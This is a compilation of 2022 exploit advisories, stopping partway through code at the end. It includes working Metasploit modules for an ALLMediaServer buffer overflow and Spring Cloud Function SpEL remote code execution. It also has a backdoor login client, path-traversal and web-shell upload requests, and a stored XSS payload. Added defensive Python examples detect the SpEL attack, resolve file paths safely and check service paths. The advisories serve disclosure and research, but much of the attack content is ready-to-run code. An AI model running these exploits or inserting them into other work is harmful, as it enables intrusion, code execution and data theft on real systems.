<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/a6437375fff871dff97dc91c8fd6259f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Jokerdoor<br />Vulnerability: Weak Hardcoded Credentials<br />Family: Jokerdoor<br />Type: PE32<br />MD5: a6437375fff871dff97dc91c8fd6259f<br />Vuln ID: MVID-2022-0531<br />Dropped files: Random name "awup.exe"<br />Disclosure: 04/02/2022<br />Description: The malware listens on TCP port 27374. The password "mathiasJ" is weak and hardcoded in the PE file. Failed authentication produces a "POPUP incorrect password..." message; connecting with TELNET produces the error "PWDPerror reading password...". Connecting with the Nc64.exe utility appends a trailing line feed character "\n" to the supplied password, which makes the cmp check fail even when the password is correct.<br /><br />004BDA0C | 8B 45 EC | mov eax,dword ptr ss:[ebp-14] | [ebp-14]:" mathiasJ\n"<br />004BDA0F | 8B 15 0C AC 4D 00 | mov edx,dword ptr ds:[4DAC0C] | 004DAC0C:&"mathiasJ"<br />004041C7 | 39 D0 | cmp eax,edx | eax" mathiasJ\n", edx"mathiasJ"<br /><br />So we need to write a custom client. The password must be sent with no whitespace and prefixed with "PWD", e.g. "PWDmathiasJ". On successful authentication we get a message such as "PWDconnected time, date Legends 2.1". 
<br /><br />Exploit/PoC:<br />import socket<br />import time<br /><br />MALWARE_HOST = "x.x.x.x"<br />PORT = 27374<br /><br />def chk_res(s):<br />    # Read until the backdoor's reply is terminated (NUL or newline),<br />    # the connection closes, or the socket timeout expires.<br />    res = b""<br />    while True:<br />        try:<br />            chunk = s.recv(512)<br />        except socket.timeout:<br />            break<br />        if not chunk:<br />            break<br />        res += chunk<br />        if b"\0" in res or b"\n" in res:<br />            break<br />    return res.decode("latin-1", "replace")<br /><br />def doit():<br />    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />    s.settimeout(5)<br />    s.connect((MALWARE_HOST, PORT))<br />    time.sleep(1)<br /><br />    # "PWD" prefix, no separator and no trailing newline, otherwise the<br />    # cmp check shown above fails.<br />    PAYLOAD = b"PWDmathiasJ"<br />    s.send(PAYLOAD)<br /><br />    time.sleep(1)<br />    print(chk_res(s))<br />    s.close()<br /><br />if __name__ == "__main__":<br />    doit()<br />    print("Malvuln")<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>*I. SUMMARY*<br />Title: [CVE-2022-26233] Barco Control Room Management Suite File Path<br />Traversal Vulnerability<br />Product: Barco Control Room Management Suite before 2.9 build 0275 and all<br />prior versions<br />Vulnerability Type: File Path Traversal<br />Credit by/Researcher: Murat Aydemir from Accenture Cyber Security Team<br />(Prague CFC)<br />Contact: https://twitter.com/mrtydmr75<br />Github: https://github.com/murataydemir<br /><br />*II. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES*<br />CVE Number: CVE-2022-26233<br />CVSSv3: Base score: 7.5 Impact 3.6 Exploitability: 3.9<br />CVSSv3 Vector: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)<br />Vulnerability Type: File Path Traversal<br />CWE ID: CWE-22 Improper Limitation of a Pathname to a Restricted Directory<br />('Path Traversal')<br /><br />*III. PROOF OF CONCEPT (POC) FOR CVE-2022-26233*<br />Because input taken from the URL is not sanitized, the application is<br />vulnerable to file path traversal. Successful exploitation of this<br />vulnerability could allow an attacker to access and read files and<br />directories stored on the file system, including application source code,<br />configuration and critical system files. No authentication is required to<br />exploit this vulnerability: an attacker who is not logged into the<br />application can exploit it directly.<br /><br />GET /..\..\..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts<br />HTTP/1.1<br />Host: vulnerablehost<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0)<br />Gecko/20100101 Firefox/81.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: close<br /><br />[image: file-path-traversal.PNG]<br /><br />*IV. REFERENCE(S)*<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26233<br />https://nvd.nist.gov/vuln/detail/CVE-2022-26233<br />https://www.barco.com/en/support/knowledge-base/kb115*XX*<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/867c6b432ccd4aa51adc5e2722a4b144.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wollf.h<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware runs with SYSTEM integrity and listens on TCP port 7614. Third-party adversaries who can reach an infected host can run commands made available by the backdoor.<br />Family: Wollf<br />Type: PE32<br />MD5: 867c6b432ccd4aa51adc5e2722a4b144<br />Vuln ID: MVID-2022-0530<br />Dropped files: wrm.exe<br />Disclosure: 04/02/2022<br /><br />Exploit/PoC:<br />c:\>nc64.exe x.x.x.x 7614<br />"Wollf Remote Manager" v1.6<br />Code by wollf, http://www.xfocus.org<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#help<br /><br />DOS Switch to MS-DOS prompt<br />DIR/LS/LIST Directory and file list<br />CD Entry directory<br />MD/MKDIR Make directory<br />PWD Get current dirctory<br />COPY/CP Copy file<br />DEL/RM Delete directory/file<br />REN/RENAME Rename file<br />MOVE/MV Move file<br />TYPE/CAT Type text file<br /><br />POPMSG Popup message box<br />SYSINFO Get system information<br />WHO/W Get current connections<br /><br />SHELL Execute command by system shell(cmd.exe)<br />EXEC/RUN Execute file by windows API(WinExec)<br />WS Windows list<br />PS Process list<br />KILL Kill process<br /><br />GET/GETFILE Download file from remote machine<br />PUT/PUTFILE Upload file to remote machine<br />WGET Get file from web server<br />FGET Get file from ftp server<br />FPUT Put file to ftp server<br />TELNET Connect to other host<br /><br />FTPD Start ftp service<br />TELNETD/TELD/EXPORT Start telnet service (export shell)<br /><br />REDIR Redirect tcp data from <Port> to <Dest_host:Dest_port><br />REDIR_STOP Stop redirect tcp data<br />SNIFF Sniff ftp/smtp/pop3/http password what via ethernet<br />SNIFF_STOP Stop ethernet sniffer<br />KEYLOG 
Start keyboard record<br />KEYLOG_STOP Stop keyboard record<br /><br />REBOOT Reboot windows<br />SHUTDOWN Shutdown windows<br />EXIT Close current connection<br />QUIT Close all connection and abort service<br />REMOVE Remove service<br />VER/VERSION Version information<br />HELP/H/? Show help message<br /><br />Type "HELP | MORE" for multipage display.<br /><br />Command "HELP" succeed.<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#<br /></code></pre>
<pre><code># Exploit Title: Sherpa Connector Service (v2020.2.20328.2050) - Unquoted Service Path<br /># Exploit Author: Manthan Chhabra (netsectuna), Harshit (fumenoid)<br /># Version: 2020.2.20328.2050<br /># Date: 02/04/2022<br /># Vendor Homepage: http://gimmal.com/<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on: Windows 10<br /># CVE: CVE-2022-23909<br /><br /><br /># Steps to discover the Unquoted Service Path:<br /><br /><br />C:\>wmic service get name,displayname,pathname,startmode | findstr /i "sherpa" | findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br />Sherpa Connector Service Sherpa Connector Service C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe Auto<br /><br /><br />C:\>sc qc "Sherpa Connector Service"<br /><br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: Sherpa Connector Service<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Sherpa Connector Service<br /> DEPENDENCIES : wmiApSrv<br /> SERVICE_START_NAME : LocalSystem<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /># Author: Hejap Zairy<br /># Date: 1.08.2022<br /># Exploit Proof<br /># Proof and Exploit:<br />#image:https://i.imgur.com/yLrRR2t.png<br />#video:https://streamable.com/x4i50c<br /><br /><br /><br />require 'msf/core'<br /> <br />class Metasploit4 < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> <br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Exploit::Seh<br /> <br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'ALLMediaServer 1.6 Buffer Overflow',<br /> 'Description' => %q{<br /> This module exploits a stack buffer overflow in ALLMediaServer 1.6<br /> The vulnerability is caused due to a boundary error within the<br /> handling of HTTP request.<br /> Thank you Saud Alenazi and 0xSaudi <br /> and Muhammad Al Ahmadi and all the friends in Tuwaiq i Love Tuwaiq<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' =><br /> [<br /> 'Hejap Zairy Al-Sharif', # Remote exploit and Metasploit module<br /> ],<br /> 'DefaultOptions' =><br /> {<br /> 'ExitFunction' => 'process', #none/process/thread/seh<br /> },<br /> 'Platform' => 'win',<br /> 'Payload' =><br /> {<br /> # double quotes: in Ruby '\x00' in single quotes is the four literal characters \ x 0 0<br /> 'BadChars' => "\x00\x0a\x0d\xff"<br /> },<br /> <br /> 'Targets' =><br /> [<br /> [ 'ALLMediaServer 1.6 / Windows 10 - English',<br /> {<br /> 'Ret' => 0x0040590B, # POP ESI # POP EBX # RET <br /> 'Offset' => 1072<br /> }<br /> ],<br /> [ 'ALLMediaServer 1.6 / Windows XP SP3 - English',<br /> {<br /> 'Ret' => 0x0040590B, # POP ESI # POP EBX # RET <br /> 'Offset' => 1072<br /> }<br /> ],<br /> [ 'ALLMediaServer 1.6 / Windows 7 SP1 - English',<br /> {<br /> 'Ret' => 0x0040590B, # POP ESI # POP EBX # RET <br /> 'Offset' => 1072<br /> }<br /> ],<br /> ],<br /> 'Privileged' => false,<br /> 'DisclosureDate' => 'Apr 1 2022',<br /> 'DefaultTarget' => 1))<br /> <br /> 
register_options([Opt::RPORT(888)], self.class)<br /> <br /> end<br /> <br /> def exploit<br /> connect<br /> buffer = ""<br /> buffer << make_nops(target['Offset'])<br /> buffer << "\xeb\x06\x90\x90"<br /> buffer << "\x0B\x59\x40\x00"<br /> buffer << make_nops(100)<br /> buffer << payload.encoded<br /> buffer << make_nops(50)<br /> print_status("Sending payload ... \n Exploit MediaServer")<br /> sock.put(buffer)<br /> handler<br /> disconnect<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin uleak-security-dashboard 1.2.3 - Stored Cross-Site Scripting (Authenticated)<br /># Date: 31-03-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/uleak-security-dashboard/ <https://wordpress.org/plugins/amministrazione-aperta/><br /># Version: 1.2.3<br /># Tested on: Firefox<br /># Contact me: h [at] spidersilk.com<br /><br /># Vulnerable Code:<br /><br />```<br /><th scope="row"><label>ULeak API Key*: </label></th><br /><td><input type="text" name="ul_apikey" placeholder="XXXXXXXXXXX"<br />value="'.$user['apikey'].'"><span class="description">(Insert your ULeak<br />API Key. Find your Credentials in your profil settings <a target="_blank"<br />href="https://uleak.de/profil">here</a>)</span></td><br />```<br /><br /># POC<br /><br />1) Install the uleak-security-dashboard WordPress plugin<br />2) Navigate to http://localhost/wp-admin/tools.php?page=uleak<br />3) Inject the payload ```"><script>alert(1)</script>```<br />in the *ULeak API Key* field.<br />4) The XSS will trigger.<br /><br /># POC Image<br /><br />https://prnt.sc/D7sq6IlNtNaf<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Spring Cloud Function SpEL Injection',<br /> 'Description' => %q{<br /> Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using<br /> an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting<br /> the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code<br /> execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.<br /> },<br /> 'Author' => [<br /> 'm09u3r', # vulnerability discovery<br /> 'hktalent', # github PoC<br /> 'Spencer McIntyre'<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-22963'],<br /> ['URL', 'https://github.com/hktalent/spring-spel-0day-poc'],<br /> ['URL', 'https://tanzu.vmware.com/security/cve-2022-22963'],<br /> ['URL', 'https://attackerkb.com/assessments/cda33728-908a-4394-9bd5-d4126557d225']<br /> ],<br /> 'DisclosureDate' => '2022-03-29',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 1,<br /> 'DefaultOptions' => 
{<br /> 'RPORT' => 8080,<br /> 'TARGETURI' => '/functionRouter'<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/'])<br /> ])<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI'])<br /> )<br /><br /> return CheckCode::Unknown unless res<br /><br /> # both vulnerable and patched servers respond with 500 and a JSON body with these keys<br /> return CheckCode::Safe unless res.code == 500<br /> return CheckCode::Safe unless %w[timestamp path status error message].to_set.subset?(res.get_json_document&.keys&.to_set)<br /><br /> # best we can do is detect that the service is running<br /> CheckCode::Detected<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /><br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> vprint_status("Executing command: #{cmd}")<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI']),<br /> 'headers' => {<br /> 'spring.cloud.function.routing-expression' => "T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub("'", "''")}'})"<br /> }<br /> )<br /><br /> fail_with(Failure::Unreachable, 'Connection failed') if res.nil?<br /> fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 500 error') unless res.code == 500<br /> end<br />end<br /></code></pre>
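Added example, not part of the Metasploit module or the advisory material above: a traffic/log check that flags requests whose spring.cloud.function.routing-expression header carries code-execution SpEL of the shape the module sends (a T(...) type reference into java.lang.Runtime), while leaving ordinary routing expressions marked for review. The sample requests and the host name app.example are constructed.

```python
import re

# Header that CVE-2022-22963 abuses: Spring Cloud Function evaluates its value
# as a SpEL expression to pick the function that should handle the request.
ROUTING_HEADER = "spring.cloud.function.routing-expression"

# SpEL constructs a routing expression never needs: type references T(...),
# reflection, and process spawning. The T( check is case-sensitive and must
# not be preceded by a word character, so identifiers ending in 't(' pass.
SUSPICIOUS = re.compile(
    r"(?<![\w.])T\s*\("
    r"|java\.lang\.(?:Runtime|ProcessBuilder|Class|System)"
    r"|getRuntime\s*\(|\.exec\s*\(|forName\s*\("
)


def parse_request(raw: str):
    """Return (request line, headers) from a raw HTTP request.

    Header names are lower-cased because HTTP treats them case-insensitively;
    an attacker can send the header in any case and Spring still honours it.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def classify_request(raw: str) -> str:
    """'attack'  - routing header carries code-execution SpEL
    'review'  - header present but looks like ordinary routing
    'clean'   - header absent"""
    _, headers = parse_request(raw)
    expr = headers.get(ROUTING_HEADER)
    if expr is None:
        return "clean"
    return "attack" if SUSPICIOUS.search(expr) else "review"


def triage(raw_requests) -> dict:
    """Count verdicts over a batch of captured requests."""
    counts = {"clean": 0, "review": 0, "attack": 0}
    for raw in raw_requests:
        counts[classify_request(raw)] += 1
    return counts


# Constructed sample traffic: a plain call, a legitimate routing expression,
# and an attempt shaped like the module's payload with the header name in a
# different case.
SAMPLE_REQUESTS = [
    "POST /functionRouter HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: text/plain\r\n\r\nhello",
    "POST /functionRouter HTTP/1.1\r\nHost: app.example\r\n"
    "spring.cloud.function.routing-expression: "
    "headers['lang']=='de' ? 'german' : 'english'\r\n\r\nhello",
    "POST /functionRouter HTTP/1.1\r\nHost: app.example\r\n"
    "Spring.Cloud.Function.Routing-Expression: T(java.lang.Runtime)"
    ".getRuntime().exec(new String[]{'/bin/sh','-c','id'})\r\n\r\nhello",
]

if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(classify_request(raw), "<-", parse_request(raw)[0])
    print(triage(SAMPLE_REQUESTS))
```

Because the module notes that patched and unpatched servers both answer 500, the response code alone is not a useful signal; the header content is.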
<pre><code>===============================================================================<br /> title: IdeaRE RefTree Download Path Traversal<br /> product: IdeaRE RefTree < 2021.09.17<br /> vulnerability type: Directory Traversal<br /> CVE ID: CVE-2022-27248<br /> severity: Medium<br /> CVSSv3 score: 4.3<br /> CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N<br /> found: 2021-09-13<br /> by: Savino Sisco <saviosisco@gmail.com><br />===============================================================================<br /><br />[EXECUTIVE SUMMARY]<br />RefTree is a web application made for managing complex real estate situations.<br />Among other features, it offers the possibility for authenticated users<br />to upload and download DWG (CAD drawings) files for buildings.<br /><br />During a penetration test activity, a "Directory Traversal" vulnerability<br />was found in the download feature, which allows downloading arbitrary files<br />with the "dwg" extension. The application does check that the filename<br />ends with "dwg", so it is not possible to download files with other extensions.<br /><br />This vulnerability may also allow stealing NTLM hashes of the host system<br />by supplying, as the download path, a UNC path pointing to an<br />attacker-controlled machine running a tool like Responder.<br /><br />[VULNERABLE VERSIONS]<br />IdeaRE RefTree < 2021.09.17<br /><br />[TECHNICAL DETAILS]<br />It is possible to reproduce the issue following these steps:<br />1. Log into the application to get a valid session cookie<br />2. Use the API endpoint '/CaddemServiceJS/CaddemService.svc/rest/DownloadDwg'<br /> to download an arbitrary "dwg" file (UNC paths are accepted).<br /><br /><br />Example of the request to the Download endpoint:<br /><br />POST /CaddemServiceJS/CaddemService.svc/rest/DownloadDwg HTTP/2<br />Host: [REDACTED]<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0<br />Accept: application/json, text/plain, */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/json<br />Content-Length: 111<br />Origin: https://[REDACTED]<br />Referer: https://[REDACTED]/Reftreespace/<br />Cookie: ASP.NET_SessionId=dezu5r0zswyqk4dukwt5jt5n<br /><br />{<br /> "path": "C:\\Users\\Public\\test.dwg"<br />}<br /><br /><br />HTTP/2 200 OK<br />Cache-Control: private<br />Content-Type: application/json; charset=utf-8<br />Server: Microsoft-IIS/10.0<br />Access-Control-Allow-Credentials: true<br />Access-Control-Allow-Origin: https://[REDACTED]<br />X-Powered-By: ASP.NET<br />Date: Thu, 10 Oct 2021 11:21:32 GMT<br />Content-Length: 241916<br /><br />{"DownloadDwgResult":[BASE64_FILE_REDACTED]}<br /><br /><br />[VULNERABILITY REFERENCE]<br />The following CVE ID was allocated to track the vulnerability:<br />CVE-2022-27248<br /><br /><br />[DISCLOSURE TIMELINE]<br />2021-09-13 Vulnerability disclosed to our customer and the vendor.<br /> Vendor acknowledged the issue.<br />2021-09-17 Vendor released a fix for the software.<br />2021-10-15 The vulnerability was rechecked in the newer version to confirm<br /> that it was indeed fixed.<br />2022-03-15 Researcher requested to publicly disclose the issue; public<br /> coordinated disclosure.<br /><br />[RESOLUTION]<br />Update the software to a version >= 2021.09.17<br /><br />[CONTACT DETAILS]<br />Savino Sisco <saviosisco@gmail.com><br />https://www.linkedin.com/in/savino-sisco/<br /></code></pre>
<pre><code>===============================================================================<br /> title: IdeaRE RefTree Remote Code Execution<br /> product: IdeaRE RefTree < 2021.09.17<br /> vulnerability type: Unrestricted File Upload<br /> CVE ID: CVE-2022-27249<br /> severity: High<br /> CVSSv3 score: 8.8<br /> CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br /> found: 2021-09-13<br /> by: Savino Sisco saviosisco@gmail.com<br />===============================================================================<br /><br />[EXECUTIVE SUMMARY]<br />RefTree is a web application made for managing complex real estate situations.<br />Among other features, it offers the possibility for authenticated users<br />to upload and download DWG (CAD drawings) files for buildings.<br /><br />During a penetration test activity, an "Unrestricted File Upload" vulnerability<br />was found which leverages the upload feature to upload a file anywhere on the<br />target system.<br /><br />By uploading a malicious web page, like an aspx web shell, to the server's<br />web root it is possible to achieve code execution by just navigating to the<br />malicious page with a web browser.<br /><br />[VULNERABLE VERSIONS]<br />IdeaRE RefTree < 2021.09.17<br /><br />[TECHNICAL DETAILS]<br />It is possible to reproduce the issue following these steps:<br />1. Log into the application to get a valid session cookie<br />2. Get a valid "ObjId" from the application (the ID of a building to associate<br /> the file to)<br />3. Use the API endpoint '/CaddemServiceJS/CaddemService.svc/rest/UploadDwg'<br /> to upload a file on the target system, for example a web shell in the<br /> server's web root<br />4. Navigate to the new page with a web browser to trigger code execution<br /><br /><br />Example of the HTTP request to the Upload endpoint:<br /><br />POST /CaddemServiceJS/CaddemService.svc/rest/UploadDwg HTTP/2<br />Host: [REDACTED]<br />Cookie: ASP.NET_SessionId=b1125gke23enpul1ukeu1ouy<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: application/json, text/plain, */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/json<br />Content-Length: 2211<br />Origin: https://[REDACTED]<br />Referer: https://[REDACTED]/Reftreespace/<br /><br />{<br /> "FileContent": "[BASE64_PAYLOAD]",<br /> "DwgName": "C:\\inetpub\\wwwroot\\webshell.aspx",<br /> "UploadType": "WorkingCopy",<br /> "ObjId": 4774726,<br /> "ObjType": 5,<br /> "UpdateState": true,<br /> "DwgOp": 23<br />}<br /><br /><br />HTTP/2 200 OK<br />Cache-Control: private<br />Content-Type: application/json; charset=utf-8<br />Server: Microsoft-IIS/10.0<br />Access-Control-Allow-Credentials: true<br />Access-Control-Allow-Origin: [REDACTED]<br />X-Powered-By: ASP.NET<br />Date: Fri, 10 Sep 2021 15:00:53 GMT<br />Content-Length: 24<br /><br />{"UploadDwgResult":null}<br /><br /><br />[VULNERABILITY REFERENCE]<br />The following CVE ID was allocated to track the vulnerability:<br />CVE-2022-27249<br /><br /><br />[DISCLOSURE TIMELINE]<br />2021-09-13 Vulnerability disclosed to our customer and the vendor.<br /> Vendor acknowledged the issue.<br />2021-09-17 Vendor released a fix for the software.<br />2021-10-15 The vulnerability was rechecked in the newer version to confirm<br /> that it was indeed fixed.<br />2022-03-15 Researcher requested to publicly disclose the issue; public<br /> coordinated disclosure.<br /><br />[RESOLUTION]<br />Update the software to a version >= 2021.09.17<br /><br />Savino Sisco <saviosisco@gmail.com><br />https://www.linkedin.com/in/savino-sisco/<br /></code></pre>
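Added example, not part of either RefTree advisory or the Barco advisory above: a resolver that does what the Barco download handler and the RefTree DownloadDwg/UploadDwg endpoints should have done with a client-supplied file name. It rejects the backslash traversal from the Barco request, the absolute C:\ paths from both RefTree requests, UNC paths (the NTLM-leak case) and data streams, and proves the result still lies under a storage root; the extension check alone, which RefTree had, is kept but shown to be insufficient on its own. The root C:\inetpub\wwwroot\dwg and the file names are constructed.

```python
import ntpath

# Constructed storage root; the real locations used by Barco CRMS and RefTree
# are not given in the advisories.
DWG_ROOT = r"C:\inetpub\wwwroot\dwg"
ALLOWED_EXT = ".dwg"


class PathRejected(ValueError):
    """A client-supplied file name that must not reach the file system."""


def resolve_dwg_path(requested: str, root: str = DWG_ROOT) -> str:
    """Map a client-supplied name onto a path strictly inside `root`.

    Windows treats forward and back slashes alike, so both are normalised
    before any check. An extension check on its own (what RefTree did) is
    not enough: traversal segments, absolute paths and UNC paths all keep
    the extension.
    """
    if not requested or any(ord(c) < 0x20 for c in requested):
        raise PathRejected("empty name or control character")
    name = requested.replace("/", "\\")
    if name.startswith("\\"):
        # Rooted paths (\dir\x.dwg) and UNC paths (\\host\share\x.dwg). A UNC
        # path makes the server open an outbound SMB session, which is how
        # NTLM hashes leak to a host running a tool like Responder.
        raise PathRejected("rooted or UNC path")
    if ":" in name:
        # Drive letters (C:\...) and NTFS alternate data streams (x.dwg:y).
        raise PathRejected("drive letter or data stream")
    if not name.lower().endswith(ALLOWED_EXT):
        raise PathRejected("extension not permitted")

    root_norm = ntpath.normpath(root)
    resolved = ntpath.normpath(ntpath.join(root_norm, name))
    # normpath collapses '..' lexically; commonpath (case-insensitive on
    # ntpath, component-wise rather than a string prefix test) then proves
    # the result still lies below the root, so 'dwgfoo' cannot pass as 'dwg'.
    if ntpath.commonpath([root_norm, resolved]) != root_norm:
        raise PathRejected("path escapes the storage root")
    return resolved


def check(requested: str) -> str:
    """Resolved path on success, 'REJECTED: <reason>' otherwise (for logs)."""
    try:
        return resolve_dwg_path(requested)
    except PathRejected as exc:
        return f"REJECTED: {exc}"


if __name__ == "__main__":
    # The Barco traversal path, the two RefTree request values, a UNC path
    # and a benign name with a harmless '..' that stays inside the root.
    for name in (
        r"..\..\..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts",
        r"C:\Users\Public\test.dwg",
        r"C:\inetpub\wwwroot\webshell.aspx",
        r"\\filesrv\share\x.dwg",
        r"sub\..\building42.dwg",
    ):
        print(f"{name!r:72} -> {check(name)}")
```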
<pre><code># Exploit Title: EG Free AntiVirus v2020 - Unquoted Service Path (Local Privilege Escalation)<br /># Date: 24/01/2022<br /># Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)<br /># Vendor Homepage: http://www.egsoftweb.in/index.aspx<br /># Software Link: http://www.egsoftweb.in/OurProduct_Readmore.aspx?id=6<br /># Version: 2020<br /># Tested: Windows 10 (x64)<br /># CVE: CVE-2021-46439<br /><br />-------------<br />Description:<br />-------------<br /><br />EG Free AntiVirus (v2020) installs a service (WinSEGAV AutoConfig) with<br />an unquoted service path. Since this service is running as SYSTEM, it<br />creates a local privilege escalation vulnerability. To properly exploit<br />this vulnerability, a local attacker must insert an executable in the<br />path of the service. Rebooting the system or restarting the service<br />will run the malicious executable with elevated privileges.<br /><br />------------------<br />Proof of Concept:<br />------------------<br /><br />C:\Users\shah>sc qc "WinSEGAV AutoConfig"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: WinSEGAV AutoConfig<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files\EGSoftWeb\EG Anti Virus\egavser.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Windows Service For EG Free AntiVirus<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />Best regards,<br />Shahrukh Iqbal Mirza.<br /></code></pre>
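Added example, not from either unquoted-service-path advisory (Sherpa Connector above, EG Free AntiVirus here): a check that parses sc qc output, decides whether BINARY_PATH_NAME is unquoted and contains spaces, lists the directories whose write ACLs then need auditing (CreateProcess tries each space-delimited prefix before the real image), and emits the sc config line that re-registers the service with a quoted path. The sample is the EG Free AntiVirus listing above with its wrapped path line rejoined; field spacing is constructed.

```python
import ntpath
import re

# Constructed sample: the 'sc qc' output quoted in the advisory above, with the
# BINARY_PATH_NAME line rejoined and column spacing as sc prints it.
SC_QC_SAMPLE = """\
SERVICE_NAME: WinSEGAV AutoConfig
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
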